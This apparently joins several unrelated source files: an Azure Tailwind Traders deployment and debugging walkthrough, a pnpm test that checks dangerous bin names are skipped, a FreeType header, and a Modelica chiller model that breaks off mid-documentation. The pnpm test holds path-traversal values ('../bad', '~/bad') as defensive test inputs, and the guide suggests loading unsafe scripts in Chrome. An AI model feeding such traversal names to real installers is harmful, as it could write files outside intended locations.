    > **Note** Staging certificates **are not trusted**, so browsers will complain about them, exactly in the same way that they complain about a self-signed certificate. The only purpose is to test that the deployment works, but in any production environment you must use the `prod` environment. The main difference is that the Let's Encrypt API call rates are more limited than the staging ones.
Another way to validate your certificate deployment is doing a `kubectl describe cert tt-cert-staging` (or `tt-cert-prod`). In the `Events` section you should see that the certificate has been obtained:
```
Events:
Type Reason Age From Message
---- ------ ---- ---- -------
Normal CreateOrder 10m cert-manager Created new ACME order, attempting validation...
Normal DomainVerified 9m cert-manager Domain "e43cd6ae16f344a093dc.eastus.aksapp.io" verified with "http-01" validation
Normal IssueCert 9m cert-manager Issuing certificate...
Normal CertObtained 9m cert-manager Obtained certificate from ACME server
Normal CertIssued 9m cert-manager Certificate issued successfully
```
## Walkthrough: Deploying the website
1. ARM template is provided so that you can automate the creation of the resources for the website. Select the **Deploy to Azure** button (or right click and select the Open in new tab option) to spin up App Service, Azure Container Registry (ACR).
[](https://portal.azure.com/#create/Microsoft.Template/uri/https%3A%2F%2Fraw.githubusercontent.com%2FMicrosoft%2FTailwindTraders-Website%2Fmaster%2FDeploy%2Fdeployment.json)

1. When deploying to Azure pay attention to parameter - **Api Base Url**.
- The base url is the URL of the created Kubernetes service's **HTTP application routing domain**. Refer below image for the **Url** to be copied from your created Kubernetes service, which is deployed in the backend resource group. It defaults to the public test environment provided by Microsoft.

1. Below resources are created after the deployment.

1. To see the website, navigate to the **App Service** and click on the **URL**.


1. In order to see if the backend is working, navigate to the tabs under the website. If you are not using SSL/TLS, load the page in **_http://_** mode or click on **Load unsafe scripts** in Chrome browser.

## Walkthrough: Azure Dev Spaces
Azure Dev Spaces allow debug and develop micro services in a team environment without disturbing other people work. Every developer has its own space where changes can be deployed without impacting other people.
You will need the following to be installed -
- [Visual Studio Code installed](https://code.visualstudio.com/download).
- The [Azure Dev Spaces for VS Code](https://marketplace.visualstudio.com/items?itemName=azuredevspaces.azds), [Java Extension Pack](https://marketplace.visualstudio.com/items?itemName=vscjava.vscode-java-pack), [Java for Azure Dev Spaces (Preview)](https://marketplace.visualstudio.com/items?itemName=vscjava.vscode-java-debugger-azds) extensions for Visual Studio Code installed.
- [Azure CLI installed](/cli/azure/install-azure-cli?view=azure-cli-latest) (version greater than 2.0.62).
To enable Azure Dev Spaces on your AKS cluster, use the use-dev-spaces command to enable Dev Spaces on your AKS cluster and follow the prompts. The below command enables Dev Spaces on the AKS cluster inside the resource group and creates a Dev Space called dev. When prompted for a Kubernetes namespace to be used as a Dev Space, enter `dev`. When prompted for the parent devspace, select `None` (0).
```cmd
$ az aks use-dev-spaces -g <<ResourceGroup>> -n <<AKS>>
Installing Dev Spaces commands...
A separate window will open to guide you through the installation process.
An Azure Dev Spaces Controller will be created that targets resource '<<AKS>>' in resource group '<<ResourceGroup>>'. Continue? (y/N): y
Creating and selecting Azure Dev Spaces Controller '<<AKS>>' in resource group '<<ResourceGroup>>' that targets resource '<<AKS>>' in resource group '<<ResourceGroup>>'...2m 40s
Select a dev space or Kubernetes namespace to use as a dev space.
[1] default
Type a number or a new name: dev
Dev space 'dev' does not exist and will be created.
Select a parent dev space or Kubernetes namespace to use as a parent dev space.
[0] <none>
[1] default
Type a number: 0
Creating and selecting dev space 'dev'...1s
Managed Kubernetes cluster '<<AKS>>' in resource group '<<ResourceGroup>>' is ready for development in dev space 'dev'. Type `azds prep` to prepare a source directory for use with Azure Dev Spaces and `azds up` to run.
```
### Introduce a bug in the stock API
Let's take on the role of _Alice_, a developer who is trying to reproduce a bug in stock API that makes the API return all products out of stock.
In this scenario, comment a particular line of code in your local repository under `Source/Services/Tailwind.Traders.Stock.Api/src/main/java/Tailwind/Traders/Stock/Api/StockController.java`. You don’t have to compile after commenting the line of code.
```
response.setProductStock(stock.getStockCount());
```
### Prepare source for Dev Spaces
Deploy using Dev Spaces is done using the same Helm charts (located in `/Deploy/helm`) used in the standard deployment. You need to have a valid _gvalues.yaml_ configuration file created. From a PowerShell command line in folder `/Source` type:
```ps
.\prepare-devspaces.ps1 -file <path-to-your-gvalues-file>
```
This will copy your _gvalues_ file in `/Deploy/helm` folder with the name `gvalues.azds.yaml`. Dev spaces deployment files expect to have the _gvalues_ file in that folder with that name (**note**: File is added in `.gitignore`).
### Deploying the service account and secrets in the namespace
Run Create-Secret.ps1 inside /Deploy/powershell it will create ttsa and ACR secret related to your **namespace**.
- `-resourceGroup`: Name of the resource group **Required for this demo**.
- `-acrName`: Name of your Azure Container Registry **Required for this demo**.
- `-clientId`: Service Principal Id.
- `-password`: Service Principal Password.
- `-namespace`: Name of your namespace defined above, default is empty. **Required for this demo for example `dev`**.
### Deploy all the APIs to the dev Dev Space
The `dev` Dev Space acts as a root Dev Space, where "shared" version of code is deployed. This could be the code deployed by a CD pipeline.
To deploy, just run `azds up -d -v` from a command line, once in these folders:
- `/Source/Services/Tailwind.Traders.Cart.Api`
- `/Source/Services/Tailwind.Traders.Coupon.Api`
- `/Source/Services/Tailwind.Traders.Login.Api`
- `/Source/Services/Tailwind.Traders.PopularProduct.Api`
- `/Source/Services/Tailwind.Traders.Product.Api`
- `/Source/Services/Tailwind.Traders.Profile.Api`
- `/Source/Services/Tailwind.Traders.Stock.Api`
- `/Source/ApiGWs/Tailwind.Traders.Bff`
- `/Source/ApiGWs/Tailwind.Traders.WebBff`
Once finished, the `azds list-up` command should list all APIs in root the Dev Space `dev`:

### Deploy Web to the dev Dev Space
This needs to be done from the [TailwindTraders Web repository](https://github.com/Microsoft/TailwindTraders-Website)
Just run `azds up -d -v` from a command line in the folder:
- `/Source/Tailwind.Traders.Web`
### Try the parent Dev Space
The parent `dev` Dev Space is deployed, and ready to be tested. Run `azds list-uris --all` to get all the entry points for all APIs and the web:

When deploying on a Dev Space, all services are exposed using an ingress, even though they are internal ones; for easy testing.
Now, grab the URL of the web and paste in your browser:

### Bug Scenario
Web shows all products "out of stock":

Data seems to be correct in the database, but no matter which product id is passed, the stock API always returns no stock:

### Creating a child Dev Space for debugging
Alice is assigned to solve this bug, so she creates a new Dev Space for herself. Type `azds space select` and create a new Dev Space child of `dev` as this new Dev Space has to be a child Dev Space of the `dev` root Dev Space:

Alice can verify that she is in her own Dev Space by typing `azds space list` and checking the `dev/alice` Dev Space is selected (marked with an asterisk):

Great! Alice is in her own Dev Space, so all changes she deploys will be isolated to her and won't affect other developers in the same development environment. Alice gets her own entry points (URIs) to access her own versions of the services. If the service is not deployed in her Dev Space, the service deployed in the parent Dev Space (`dev`) will be used instead. Just like earlier, the command `azds list-uris` shows the URLs of the services. However, since Alice selected her `dev/alice` Dev Space, now she sees her own URIs:

### Deploy the ttsa service account on her namespace
**Before deploying any API to her own Dev Space** Alice has to deploy the `ttsa` service account. She needs to do it only once using `kubectl`. The file to deploy is `/Deploy/helm/ttsa.yaml` and it must be deployed in the namespace `alice` because that is the name of her Dev Space:
```
kubectl apply -f Deploy\helm\ttsa.yaml -n alice
```
### Debugging the Tasks API using Visual Studio Code
It's time for Alice to use Visual Studio Code to debug the Task API. Alice goes to the her local repository folder `/Source/Services/Tailwind.Traders.Stock.Api` and opens it with Visual Studio Code. Then selects the command _Azure Dev Spaces: Prepare configuration files for Azure Dev Spaces_ from the _Command Palette_ or (Ctlr+Shift+P):

Visual Studio Code will ask for the base image to use (select the one based on Azul Zulu):

Finally, VS Code will ask for the default port. Choose 8080:

Once finished, a `launch.json` and a `tasks.json` file is generated in the `.vscode` directory. Now the debug window of VSCode should have the option "Launch Java program (AZDS)":

> **Note** If there is any problem in performing these steps, **just delete the `.vscode` folder and rename the folder `.generated.vscode` to `.vscode`**. The `.generated.vscode` folder contains the final scripts that VS Code needs for using Dev Spaces.
Alice uses this option to launch the Tasks API on her own Dev Space. This will take a while since VS Code needs to update all code in the Alice Dev Space (under the hood an `azds up` is performed).
Visual Studio Code will show a **localhost** address in the status bar:

Alice can use this address to access the Tasks API **running on her Dev Space**. Don't be confused because of the _localhost_ address. Tasks API is not running in Alice's machine, it is running in AKS, the _localhost_ address is just tunneled. A `azds list-uris` run from command prompt will give the same info:

For starting her debug session, Alice puts a break point in the file `src/main/java/Tailwind/Traders/Stock/Api/StockController.java` in line where `stock` is checked against `null` in method `StockProduct`:

She now needs to trigger the breakpoint. There are two options:
1. Alice can use the _localhost_ address to make a direct call to the Task API. This is possible if she knows what this call is.
2. If Alice is a new developer she maybe doesn’t know what this call is, but she knows how to reproduce the error: using the web and going to the details of one product.
Using option 1 is as easy as doing a call with curl to the endpoint `/v1/stock/{product_id}`:
```
curl http://localhost:55934/v1/stock/1
```
That will trigger the endpoint and the breakpoint should be hit:

The second option (using the web) shows how Dev Spaces is powerful. **Even though Alice has not deployed the web on her Dev Space**, she gets a new URL to access the web. The command `azds list-uris` gives this new url:

Note that the URL starts with `alice.s`. So, Alice can open a web browser and navigate to the URL of the web (`alice.s.dev.ttweb.xxxxxxx`):

She now can use the web, navigate to a product detail **and the breakpoint will be hit**:

Now Alice can use the debug tools incorporated with Visual Studio Code to find the error. Seems that some developer left a line commented, and this is the source of the error:

Now Alice can stop the debug session and just fix the code by uncommenting the line. Then **she can start a new debug session just to ensure the error is gone**. She doesn’t need to re-build the project, starting a new session will synchronize the file she changed locally and rebuild the API in her Dev Space.
Once the new debug session is started, Alice just refreshes the browser window to check if the error has disappeared:

Just to recap, Alice did all this debug session **without impacting any other developer**. The web now works as expected in her Dev Space while it is still failing in the `dev` namespace:

Alice can now commit the code and close the bug! CD pipeline will deploy the updated version of _Tasks API_ to the `dev` Dev Space, and all developers will get the fix.
Instead of rebuilding and redeploying a new container image each time code edits are made, Azure Dev Spaces incrementally recompiles code within the existing container to provide a faster edit/debug loop.
## Walkthrough: Virtual Nodes
Azure Kubernetes Service (AKS) virtual node allows you to elastically provision additional pods inside Container Instances that start in seconds. With a few clicks in the Azure portal, turn on the virtual node feature and get the flexibility and portability of a container-focused experience in your AKS environment without needing to manage the additional compute resources. And since your Azure Container Instances containers can join the same virtual network as the rest of your cluster, you can build Kubernetes services that seamlessly span pods running on virtual machines (VMs) and Azure Container Instances.
The goal of this demo is to view the AKS "virtual nodes" feature, that enables running some AKS pods in ACI.
### Key Takeaway
Virtual Nodes is a key feature of AKS that run some pods in ACI to allow for high scalability in scenarios where scalability can vary a lot. This demo starts with a "standard" deploy of Tailwind Traders Backend, and then this deploy is updated to allow some APIs to run on virtual nodes.
### Create the AKS with Virtual Nodes enabled
The **ARM script** provided with Tailwind Traders is not configured to create an AKS with virtual nodes feature enabled, and as this feature cannot be added to an AKS after its creation, **You will need to create an AKS with virtual nodes enabled**. You can:
- [Use Azure portal to create an AKS with virtual nodes enabled](https://docs.microsoft.com/en-us/azure/aks/virtual-nodes-portal)
- [Use the CLI to create an AKS with virtual nodes enabled](https://docs.microsoft.com/en-us/azure/aks/virtual-nodes-cli)
- Run the powershell script `/Deploy/demos/vnodes/Create-Aks.ps1`.
The PowerShell script has following parameters:
- `-resourceGroup`: Resource group to use. **Mandatory**. If not exists will be created.
- `-location`: Location where to create the resource group if needed. Defaults to `eastus2`
- `-aksName`: Name of the AKS cluster to create. Defaults to `ttvnodes`
### Create an ACR
Type following command to create an ACR:
```
az acr create -g <resource-group> -n <acr-name> --admin-enabled true --sku Standard
```
### Deploy Azure infrastructure
Run the `/Deploy/powershell/Deploy-Arm-Azure.ps1` script with following parameters:
- `-resourceGroup`: Resource group where to deploy all Azure infrastructure. If not exists it is created.
- `-location`: Location where create the resource group if needed
- `-deployAks`: Set it to `$false` so that the AKS is **NOT** created
### Deploy the Backend in the AKS
The next step is to deploy the backend in the AKS. Since you have already created this in the first section of this lab, you can move to the next step.
If you are following only this section of the lab, then there is a standard deployment, with no virtual nodes enabled. Follow steps described in the [Tailwind Traders Backend Deployment Guide](../../DeploymentGuide.md)
### Scenario
In this demo, a stress situation like _Black Friday_ is simulated. On a Black Friday, a lot of product queries are expected, so the Products API, needs to be able to handle high load. For this scenario, the deployment of the "Products API" will be updated to use virtual nodes.
### Updating the "Products API" deployment
Run `helm ls` command to find the _Products API_ release name. If you did not override the `-name` parameter in the `Deploy-Images-Aks.ps1` script, the release should be named `my-tt-product`.

The first update will be just to force Products API to run on virtual nodes. This is accomplished by adding some `nodeSelector` and `tolerations` to the product API pods. The exact values are in file `/Deploy/helm/vnodes/vnodes.yaml`.
**From a command line located in `/Deploy/helm` folder**, type following command to upgrade the helm release adding these new values:
```
helm upgrade --reuse-values --recreate-pods -f vnodes\vnodes.yaml my-tt-product .\products-api
```
A `kubectl get pods -o wide` should make clear that the _Products API_ pod is running on the virtual node:

If you go to the Azure portal, to the AKS associated resource group (the one that has the name like `MC_<resource-group>_<aks-name>_<region-name>`) you should see the ACI running the products API pod:

_Congratulations! You are running the products API on virtual nodes_.
### Scaling the products API manually
You can manually scale the products API by typing:
```
kubectl scale deployment/my-tt-product-tt-products --replicas=10
```

Each pod that runs in the virtual node is an ACI instance in the `MC_XXX` resource group:

### Auto scaling the products API
Apart from scaling manually, the products API can be configured to scale automatically using a Kubernetes standard _Horizontal Pod Autoscaler (HPA)_. The HPA definition is in file `/Deploy/helm/vnodes/hpa.yaml`.
Before deploying it, just scale down the products api deployment to one pod:
```
kubectl scale deployment/my-tt-product-tt-products --replicas=1
```
This will remove all pods (and the ACI resources) except one.
To deploy the HPA, just upgrade the helm release again, but including the `hpa.yaml` file. **From a command line located in `/Deploy/helm` folder** type:
```
helm upgrade --reuse-values --recreate-pods -f vnodes\hpa.yaml my-tt-product .\products-api
```
Once upgraded, the `kubectl get hpa` should return one result:

### Start the "Black Friday" simulation
Just run the script `/Deploy/demos/vnodes/BlackFriday.ps1` with following parameters:
- `-aksName`: Name of the AKS
- `-resourceGroup`: Resource group
The script will simulate a variable load against the Products API.
After the simulation, you can cleanup the demo for exploring further -
Delete the products API release:
```
helm delete my-tt-product --purge
```
Then use the `/Deploy/powershell/Deploy-Images-Aks.ps1` with the parameter `-charts pr` to redeploy again only the products api:
```
.\Deploy-Images-Aks.ps1 -resourceGroup <resource-group> -aksName <aks-name> -acrName <acr-name> -valuesFile <path-to-gvalues-file> -charts pr -tlsEnv staging
```
## Summary
Azure makes development teams working with micro services and Kubernetes more efficient by combining the capabilities of Visual Studio and AKS Dev Spaces. Operations team become more reliable by using powerful services like Virtual Nodes to spin up instant serverless containers when you need it the most.
| {
"pile_set_name": "Github"
} |
import getBinsFromPkg from '@pnpm/package-bins'
import path = require('path')
import test = require('tape')
test('getBinsFromPkg()', async (t) => {
t.deepEqual(
await getBinsFromPkg({
bin: 'one-bin',
name: 'one-bin',
version: '1.0.0',
}, process.cwd()),
[{
name: 'one-bin',
path: path.resolve('one-bin'),
}]
)
t.end()
})
test('get bin of scoped package', async (t) => {
t.deepEqual(
await getBinsFromPkg({
bin: 'bin.js',
name: '@foo/bar',
version: '1.0.0',
}, process.cwd()),
[{
name: 'bar',
path: path.resolve('bin.js'),
}]
)
t.end()
})
test('skip dangerous bin names', async (t) => {
t.deepEqual(
await getBinsFromPkg({
name: 'foo',
version: '1.0.0',
bin: {
'../bad': './bad',
'..\\bad': './bad',
good: './good',
'~/bad': './bad',
},
}, process.cwd()),
[
{
name: 'good',
path: path.resolve('good'),
},
]
)
t.end()
})
test('skip dangerous bin locations', async (t) => {
t.deepEqual(
await getBinsFromPkg({
name: 'foo',
version: '1.0.0',
bin: {
bad: '../bad',
good: './good',
},
}, process.cwd()),
[
{
name: 'good',
path: path.resolve('good'),
},
]
)
t.end()
})
| {
"pile_set_name": "Github"
} |
/***************************************************************************/
/* */
/* ftmisc.h */
/* */
/* Miscellaneous macros for stand-alone rasterizer (specification */
/* only). */
/* */
/* Copyright 2005, 2009, 2010 by */
/* David Turner, Robert Wilhelm, and Werner Lemberg. */
/* */
/* This file is part of the FreeType project, and may only be used */
/* modified and distributed under the terms of the FreeType project */
/* license, LICENSE.TXT. By continuing to use, modify, or distribute */
/* this file you indicate that you have read the license and */
/* understand and accept it fully. */
/* */
/***************************************************************************/
/***************************************************/
/* */
/* This file is *not* portable! You have to adapt */
/* its definitions to your platform. */
/* */
/***************************************************/
#ifndef __FTMISC_H__
#define __FTMISC_H__
/* memset */
#include FT_CONFIG_STANDARD_LIBRARY_H
#define FT_BEGIN_HEADER
#define FT_END_HEADER
#define FT_LOCAL_DEF( x ) static x
/* from include/freetype2/fttypes.h */
typedef unsigned char FT_Byte;
typedef signed int FT_Int;
typedef unsigned int FT_UInt;
typedef signed long FT_Long;
typedef unsigned long FT_ULong;
typedef signed long FT_F26Dot6;
typedef int FT_Error;
#define FT_MAKE_TAG( _x1, _x2, _x3, _x4 ) \
( ( (FT_ULong)_x1 << 24 ) | \
( (FT_ULong)_x2 << 16 ) | \
( (FT_ULong)_x3 << 8 ) | \
(FT_ULong)_x4 )
/* from include/freetype2/ftsystem.h */
typedef struct FT_MemoryRec_* FT_Memory;
typedef void* (*FT_Alloc_Func)( FT_Memory memory,
long size );
typedef void (*FT_Free_Func)( FT_Memory memory,
void* block );
typedef void* (*FT_Realloc_Func)( FT_Memory memory,
long cur_size,
long new_size,
void* block );
typedef struct FT_MemoryRec_
{
void* user;
FT_Alloc_Func alloc;
FT_Free_Func free;
FT_Realloc_Func realloc;
} FT_MemoryRec;
/* from src/ftcalc.c */
#if ( defined _WIN32 || defined _WIN64 )
typedef __int64 FT_Int64;
#else
#include "inttypes.h"
typedef int64_t FT_Int64;
#endif
static FT_Long
FT_MulDiv( FT_Long a,
FT_Long b,
FT_Long c )
{
FT_Int s;
FT_Long d;
s = 1;
if ( a < 0 ) { a = -a; s = -1; }
if ( b < 0 ) { b = -b; s = -s; }
if ( c < 0 ) { c = -c; s = -s; }
d = (FT_Long)( c > 0 ? ( (FT_Int64)a * b + ( c >> 1 ) ) / c
: 0x7FFFFFFFL );
return ( s > 0 ) ? d : -d;
}
#endif /* __FTMISC_H__ */
/* END */
| {
"pile_set_name": "Github"
} |
within Buildings.Fluid.Chillers;
model AbsorptionIndirectSteam
"Indirect steam heated absorption chiller based on performance curves"
extends Buildings.Fluid.Interfaces.FourPortHeatMassExchanger(
T1_start = 273.15+25,
T2_start = 273.15+5,
m1_flow_nominal= per.mCon_flow_nominal,
m2_flow_nominal= per.mEva_flow_nominal,
dp1_nominal = per.dpCon_nominal,
dp2_nominal = per.dpEva_nominal,
redeclare final Buildings.Fluid.MixingVolumes.MixingVolume
vol1(final V=m1_flow_nominal*tau1/rho1_nominal,
nPorts=2,
final prescribedHeatFlowRate=true),
vol2(final V=m2_flow_nominal*tau2/rho2_nominal,
nPorts=2,
final prescribedHeatFlowRate=true));
parameter Buildings.Fluid.Chillers.Data.AbsorptionIndirectSteam.Generic per
"Performance data"
annotation (choicesAllMatching= true,
Placement(transformation(extent={{60,72},{80,92}})));
parameter Modelica.SIunits.HeatFlowRate Q_flow_small = -per.QEva_flow_nominal*1E-6
"Small value for heat flow rate or power, used to avoid division by zero"
annotation(Dialog(tab="Advanced"));
Modelica.Blocks.Interfaces.BooleanInput on
"Set to true to enable the absorption chiller"
annotation (Placement(transformation(extent={{-128,2},{-100,30}}),
iconTransformation(extent={{-120,10},{-100,
30}})));
Modelica.Blocks.Interfaces.RealInput TSet(final unit="K", displayUnit="degC")
"Evaporator setpoint leaving water temperature" annotation (Placement(
transformation(extent={{-128,-38},{-100,-10}}), iconTransformation(
extent={{-120,-30},{-100,-10}})));
Modelica.Blocks.Interfaces.RealOutput P(final unit="W")
"Chiller pump power"
annotation (Placement(transformation(extent={{100,10},{120,30}}),
iconTransformation(extent={{100,-30},{120,-10}})));
Modelica.Blocks.Interfaces.RealOutput QGen_flow(final unit="W")
"Required generator heat flow rate in the form of steam"
annotation (Placement(transformation(extent={{100,-30},{120,-10}}),
iconTransformation(extent={{100,10},{120,30}})));
Modelica.Blocks.Interfaces.RealOutput QEva_flow(final unit="W")
"Evaporator heat flow rate"
annotation (Placement(transformation(extent={{100,-50},{120,-30}}),
iconTransformation(extent={{100,-96},{120,-76}})));
Modelica.Blocks.Interfaces.RealOutput QCon_flow(final unit="W")
"Condenser heat flow rate"
annotation (Placement(transformation(extent={{100,30},{120,50}}),
iconTransformation(extent={{100,74},{120,94}})));
Real PLR(min=0, final unit="1") = perMod.PLR
"Part load ratio";
Real CR(min=0, final unit="1") = perMod.CR
"Cycling ratio";
protected
BaseClasses.AbsorptionIndirectSteam perMod(
final per=per,
final Q_flow_small=Q_flow_small) "Block that computes the performance"
annotation (Placement(transformation(extent={{-52,0},{-32,20}})));
Modelica.Blocks.Sources.RealExpression QEva_flow_set(
final y=Buildings.Utilities.Math.Functions.smoothMin(
x1=m2_flow*(hEvaSet - inStream(port_a2.h_outflow)),
x2=-Q_flow_small,
deltaX=Q_flow_small/10)) "Setpoint heat flow rate of the evaporator"
annotation (Placement(transformation(extent={{-92,-28},{-72,-8}})));
Modelica.SIunits.SpecificEnthalpy hEvaSet=Medium2.specificEnthalpy_pTX(
p=port_b2.p,
T=TSet,
X=cat(
1,
port_b2.Xi_outflow,
{1 - sum(port_b2.Xi_outflow)})) "Chilled water setpoint enthalpy";
Modelica.Blocks.Sources.RealExpression TConEnt(
y=Medium1.temperature(
Medium1.setState_phX(
p = port_a1.p,
h = inStream(port_a1.h_outflow))))
"Condenser entering water temperature"
annotation (Placement(transformation(extent={{-92,-8},{-72,10}})));
Modelica.Thermal.HeatTransfer.Sensors.TemperatureSensor TEvaLvg
"Leaving evaporator temperature" annotation (Placement(transformation(
extent={{10,-10},{-10,10}},
rotation=0,
origin={-42,-40})));
HeatTransfer.Sources.PrescribedHeatFlow preHeaFloCon
"Prescribed heat flow rate for the condenser"
annotation (Placement(transformation(extent={{-10,-10},{10,10}},
rotation=0,
origin={-37,40})));
HeatTransfer.Sources.PrescribedHeatFlow preHeaFloEva
"Prescribed heat flow rate for the evaporator"
annotation (Placement(transformation(extent={{-1,-40},{19,-20}})));
equation
connect(on, perMod.on) annotation (Line(points={{-114,16},{-94,16},{-94,17},{
-53,17}},
color={255,0,255}));
connect(perMod.QCon_flow, preHeaFloCon.Q_flow) annotation (Line(points={{-31,18},
{-20,18},{-20,28},{-52,28},{-52,40},{-47,40}}, color={0,0,127}));
connect(perMod.QEva_flow, preHeaFloEva.Q_flow) annotation (Line(points={{-31,8},
{-20,8},{-20,-30},{-1,-30}}, color={0,0,127}));
connect(preHeaFloEva.port, vol2.heatPort)
annotation (Line(points={{19,-30},{28,-30},{28,-60},{12,-60}},
color={191,0,0}));
connect(perMod.QEva_flow, QEva_flow) annotation (Line(points={{-31,8},{88,8},
{88,-40},{110,-40}}, color={0,0,127}));
connect(TConEnt.y, perMod.TConEnt) annotation (Line(points={{-71,1},{-66,1},{
-66,13},{-53,13}}, color={0,0,127}));
connect(QEva_flow_set.y, perMod.QEva_flow_set) annotation (Line(points={{-71,-18},
{-64,-18},{-64,7},{-53,7}}, color={0,0,127}));
connect(preHeaFloCon.port, vol1.heatPort) annotation (Line(points={{-27,40},{-20,
40},{-20,60},{-10,60}}, color={
191,0,0}));
connect(perMod.QCon_flow, QCon_flow) annotation (Line(points={{-31,18},{86,18},
{86,40},{110,40}}, color={0,0,127}));
connect(perMod.QGen_flow, QGen_flow) annotation (Line(points={{-31,12},{92,12},
{92,-20},{110,-20}},color={0,0,127}));
connect(TEvaLvg.port, vol2.heatPort) annotation (Line(points={{-32,-40},{28,
-40},{28,-60},{12,-60}},
color={191,0,0}));
connect(TEvaLvg.T, perMod.TEvaLvg) annotation (Line(points={{-52,-40},{-60,
-40},{-60,3},{-53,3}}, color={0,0,127}));
connect(perMod.P, P) annotation (Line(points={{-31,15},{94,15},{94,20},{110,
20}}, color={0,0,127}));
annotation (Icon(graphics={
Line(points={{-40,76}}, color={238,46,47}),
Line(
points={{-100,-20},{-82,-20},{-82,-60}},
color={0,0,127},
thickness=0.5),
Rectangle(
extent={{-56,68},{58,50}},
lineColor={0,0,0},
fillColor={255,255,255},
fillPattern=FillPattern.Solid),
Rectangle(
extent={{-56,-52},{58,-70}},
lineColor={0,0,0},
fillColor={255,255,255},
fillPattern=FillPattern.Solid),
Rectangle(
extent={{-103,64},{98,54}},
lineColor={0,0,255},
pattern=LinePattern.None,
fillColor={0,0,255},
fillPattern=FillPattern.Solid),
Rectangle(
extent={{-2,54},{98,64}},
lineColor={0,0,255},
pattern=LinePattern.None,
fillColor={255,0,0},
fillPattern=FillPattern.Solid),
Rectangle(
extent={{-101,-56},{100,-66}},
lineColor={0,0,255},
pattern=LinePattern.None,
fillColor={0,0,255},
fillPattern=FillPattern.Solid),
Rectangle(
extent={{-100,-66},{0,-56}},
lineColor={0,0,127},
pattern=LinePattern.None,
fillColor={0,0,127},
fillPattern=FillPattern.Solid),
Polygon(
points={{-42,0},{-52,-12},{-32,-12},{-42,0}},
lineColor={0,0,0},
smooth=Smooth.None,
fillColor={255,255,255},
fillPattern=FillPattern.Solid),
Polygon(
points={{-42,0},{-52,10},{-32,10},{-42,0}},
lineColor={0,0,0},
smooth=Smooth.None,
fillColor={255,255,255},
fillPattern=FillPattern.Solid),
Rectangle(
extent={{-44,50},{-40,10}},
lineColor={0,0,0},
fillColor={255,255,255},
fillPattern=FillPattern.Solid),
Rectangle(
extent={{-44,-12},{-40,-52}},
lineColor={0,0,0},
fillColor={255,255,255},
fillPattern=FillPattern.Solid),
Rectangle(
extent={{38,50},{42,-52}},
lineColor={0,0,0},
fillColor={255,255,255},
fillPattern=FillPattern.Solid),
Ellipse(
extent={{24,16},{56,-16}},
lineColor={0,0,0},
fillColor={255,255,255},
fillPattern=FillPattern.Solid),
Polygon(
points={{40,16},{24,0},{56,0},{40,16}},
lineColor={0,0,0},
fillColor={0,0,0},
fillPattern=FillPattern.Solid)}),
defaultComponentName="chi",
Documentation(info="<html>
<p>
Model for an indirect steam heated absorption chiller based on performance curves.
The model uses performance curves similar to the EnergyPlus model <code>Chiller:Absorption:Indirect</code>.
</p>
<p>
The model uses six functions to predict the chiller cooling capacity, power consumption for
the chiller pump and the generator heat flow rate and the condenser heat flow.
These functions use the performance data stored in the record <code>per</code>.
The computations are as follows:
</p>
<p>
The capacity function of the evaporator is
<p align=\"center\" style=\"font-style:italic;\">
capFun<sub>eva</sub> = A<sub>1</sub> + A<sub>2</sub> T<sub>eva,lvg</sub> +
A<sub>3</sub> T<sup>2</sup><sub>eva,lvg</sub> + A<sub>4</sub> T<sup>3</sup><sub>eva,lvg</sub>.
</p>
<p>
The capacity function of the condenser is
<p align=\"center\" style=\"font-style:italic;\">
capFun<sub>con</sub> = B<sub>1</sub> + B<sub>2</sub> T<sub>con,ent</sub> +
B<sub>3</sub> T<sup>2</sup><sub>con,ent</sub> + B<sub>4</sub> T<sup>3</sup><sub>con,ent</sub>.
</p>
<p>
These capacity functions are used to compute the available cooling capacity of the evaporator as
<p align=\"center\" style=\"font-style:italic;\">
Q̇<sub>eva,ava</sub> = capFun<sub>eva</sub> capFun<sub>con</sub> Q̇<sub>eva,0</sub>,
</p>
<p>
where <i>Q̇<sub>eva,0</sub></i> is obtained from the performance data <code>per.QEva_flow_nominal</code>.
Let <i>Q̇<sub>eva,set</sub></i> denote the heat required to meet the set point <code>TSet</code>.
Then, the model computes the part load ratio as
<p align=\"center\" style=\"font-style:italic;\">
PLR =min(Q̇<sub>eva,set</sub>/Q̇<sub>eva,ava</sub>, PLR<sub>max</sub>).
</p>
<p>
Hence, the model ensures that the chiller capacity does not exceed the chiller capacity specified
by the parameter <code>per.PLRMax</code>.
The cycling ratio is computed as
<p align=\"center\" style=\"font-style:italic;\">
CR = min(PLR/PLR<sub>min</sub>, 1.0),
</p>
<p>
where <i>PRL<sub>min</sub></i> is obtained from the performance record <code>per.PLRMin</code>.
This ratio expresses the fraction of time
that a chiller would run if it were to cycle because its load is smaller than the
minimal load at which it can operate.
Note that this model continuously operates even if the part load ratio is below the
minimum part load ratio.
Its leaving evaporator and condenser temperature can therefore be considered as an
average temperature between the modes when the compressor is off and on.
</p>
<p>
Using the part load ratio, the energy input ratio of the chiller pump is
<p align=\"center\" style=\"font-style:italic;\">
EIRP = C<sub>1</sub> + C<sub>2</sub>PLR+C<sub>3</sub>PLR<sup>2</sup>.
</p>
<p>
The generator heat input ratio is
<p align=\"center\" style=\"font-style:italic;\">
genHIR = D<sub>1</sub> + D<sub>2</sub>PLR+D<sub>3</sub>PLR<sup>2</sup>+D<sub>4</sub>PLR<sup>3</sup>.
</p>
<p>
Two additional curves modifiy the heat input requirement based on the condenser inlet water temperature
and the evaporator outlet water temperature. Specifically,
the generator heat modifier based on the condenser inlet water temperature is
<p align=\"center\" style=\"font-style:italic;\">
genT<sub>con</sub> = E<sub>1</sub> + E<sub>2</sub> T<sub>con,ent</sub> +
E<sub>3</sub> T<sup>2</sup><sub>con,ent</sub> + E<sub>4</sub> T<sup>3</sup><sub>con,ent</sub>,
</p>
<p>
and the generator heat modifier based on the evaporator inlet water temperature is
<p align=\"center\" style=\"font-style:italic;\">
genT<sub>eva</sub>= F<sub>1</sub> + F<sub>2</sub> T<sub>eva,lvg</sub> +
F<sub>3</sub> T<sup>2</sup><sub>eva,lvg</sub> + F<sub>4</sub> T<sup>3</sup><sub>eva,lvg</sub>.
</p>
<p>
The main outputs of the model that are to be used in energy analysis
are the required generator heat <code>QGen_flow</code> and
the electric power consumption of the chiller pump <code>P</code>.
For example, if the chiller were to be regenerated with steam, then
<code>QGen_flow</code> is the heat that must be provided by a steam loop.
This model computes the required generator heat as
<p align=\"center\" style=\"font-style:italic;\">
Q̇<sub>gen</sub> = -Q̇<sub>eva,ava</sub> genHIR genT<sub>con</sub> genT<sub>eva</sub> CR.
</p>
<p>
The pump power consumption is
<p align=\"center\" style=\"font-style:italic;\">
P = EIRP CR P<sub>0</sub>,
</p>
<p>
